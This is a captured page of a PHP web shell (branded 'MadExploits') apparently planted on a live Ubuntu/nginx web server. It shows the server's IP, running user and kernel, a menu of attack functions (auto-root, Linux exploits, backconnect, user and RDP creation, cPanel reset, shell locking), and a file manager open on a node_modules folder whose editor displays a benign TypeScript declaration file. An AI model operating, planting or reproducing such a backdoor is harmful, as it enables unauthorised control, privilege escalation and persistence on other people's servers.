Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
entities /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
maps
[ DIR ]
dr-xr-xr-x
decode.d.ts
269
B
-rw-rw-rw-
decode.d.ts.map
290
B
-rw-rw-rw-
decode.js
2.2
KB
-rw-rw-rw-
decode_codepoint.d.ts
114
B
-rw-rw-rw-
decode_codepoint.d.ts.map
192
B
-rw-rw-rw-
decode_codepoint.js
1.13
KB
-rw-rw-rw-
encode.d.ts
1.66
KB
-rw-rw-rw-
encode.d.ts.map
427
B
-rw-rw-rw-
encode.js
4.9
KB
-rw-rw-rw-
index.d.ts
1.32
KB
-rw-rw-rw-
index.d.ts.map
684
B
-rw-rw-rw-
index.js
3.6
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : encode.d.ts
/** * Encodes all non-ASCII characters, as well as characters not valid in XML * documents using XML entities. * * If a character has no equivalent entity, a * numeric hexadecimal reference (eg. `ü`) will be used. */ export declare const encodeXML: (data: string) => string; /** * Encodes all entities and non-ASCII characters in the input. * * This includes characters that are valid ASCII characters in HTML documents. * For example `#` will be encoded as `#`. To get a more compact output, * consider using the `encodeNonAsciiHTML` function. * * If a character has no equivalent entity, a * numeric hexadecimal reference (eg. `ü`) will be used. */ export declare const encodeHTML: (data: string) => string; /** * Encodes all non-ASCII characters, as well as characters not valid in HTML * documents using HTML entities. * * If a character has no equivalent entity, a * numeric hexadecimal reference (eg. `ü`) will be used. */ export declare const encodeNonAsciiHTML: (data: string) => string; /** * Encodes all non-ASCII characters, as well as characters not valid in XML * documents using numeric hexadecimal reference (eg. `ü`). * * Have a look at `escapeUTF8` if you want a more concise output at the expense * of reduced transportability. * * @param data String to escape. */ export declare function escape(data: string): string; /** * Encodes all characters not valid in XML documents using numeric hexadecimal * reference (eg. `ü`). * * Note that the output will be character-set dependent. * * @param data String to escape. */ export declare function escapeUTF8(data: string): string; //# sourceMappingURL=encode.d.ts.map
Close